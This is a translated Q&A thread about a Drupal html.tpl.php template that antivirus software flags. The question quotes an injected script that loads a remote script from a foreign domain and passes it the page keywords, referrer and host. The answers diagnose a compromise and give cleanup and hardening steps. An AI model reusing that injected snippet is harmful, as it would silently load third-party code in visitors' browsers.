我在PHP的模块中有html.tpl.php个文件(Drupal),代码如下:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language; ?>" version="XHTML+RDFa 1.0" dir="<?php print $language->dir; ?>"<?php print $rdf_namespaces; ?>>
<head profile="<?php print $grddl_profile; ?>">
<?php print $head; ?>
<title><?php print $head_title; ?></title>
<?php print $styles; ?>
<?php print $scripts; ?>
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://atelier24-gerd-kallhardt.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body class="<?php print $classes; ?>" <?php print $attributes;?>>
<div id="skip-link">
<a href="#main-content" class="element-invisible element-focusable"><?php print t('Skip to main content'); ?></a>
</div>
<?php print $page_top; ?>
<?php print $page; ?>
<?php print $page_bottom; ?>
</body>
</html>
我的问题是有些防病毒软件将其标记为恶意软件。
请检查此virustotal report。
可能是这个标志可能因为script包含:
http://atelier24-gerd-kallhardt.de/js/jquery.min.php?
文件html.tpl.php依赖于:/modules/system/(Drupal网站)。
您可以从here下载此文件。
然后我有一些问题:
script?答案 0 :(得分:0)
这也发生在我身上。有些恶意软件正在搜索dir结构中的HTML打开文件,我想先发现这个。幸运的是,从我的主题中真正使用的那个没有被感染。
搜索&#34;工作室&#34;所有文件中的文本或此恶意软件附带的其他字符串。
它不是特别糟糕,但只是垃圾邮件发送者。
更改所有后端管理员和(S)FTP密码,并定期进行备份。
如果你是共享主机......嗯...可能是其他网站被黑了,而不是你的。
答案 1 :(得分:0)
回答你的问题:
这是一个合法的文件(尽管可能有感染)吗?
是的,这是合法的
它被感染了?
是的,它被感染了
是否存在好的(恶意软件)代码?
恶意软件永远不会好。
如何通过删除该行代码来删除坏部分?使用:script?
是的,但是你还没有解决它首先到达那里的问题。
这段代码如何附加在那里?
最有可能发生的事情是,有人会利用您过时的Drupal模块(或Drupal核心)中的某些漏洞,这些漏洞允许他们覆盖您的html.tpl.php以包含该脚本组件。
总结一下它的作用,该脚本标记旨在使访问您网站的任何人的浏览器都从一个完全不同的网站请求一个页面。这种技巧可以用来人为地夸大其他网站上的流量数字。如果作者得到的回报是因为其他网站的流量数据将被人为夸大。
如果他们向其他公司出售他们网页上的广告,那么这些策略可能会被人们用来为他们的网站带来流量,或者由网站所有者自己提供流量。他们的流量数字越高,曝光度越高&#34;广告客户获得的广告费用就越多。
您需要关注的是,在某个地方,您的网站上存在一个漏洞,允许人们覆盖您想要的网络文件夹中的文件。
您需要执行以下操作,否则问题将重新出现:
现在,您还需要确保正确保护所有文件和文件夹,确保它们是只读的(除了存储上传文件的位置)
然后,假设您在自己的服务器上,您需要考虑加强您正在使用的任何HTTP服务器(Apache,Nginx等)。
如果您不遵循这些步骤,那么在某些恶意软件扫描您的服务器,发现完全相同的漏洞并以类似方式利用它之前,只是时间问题。
理论上,你很幸运,因为它所做的只是为其他网站带来额外的流量。它可能会更糟糕。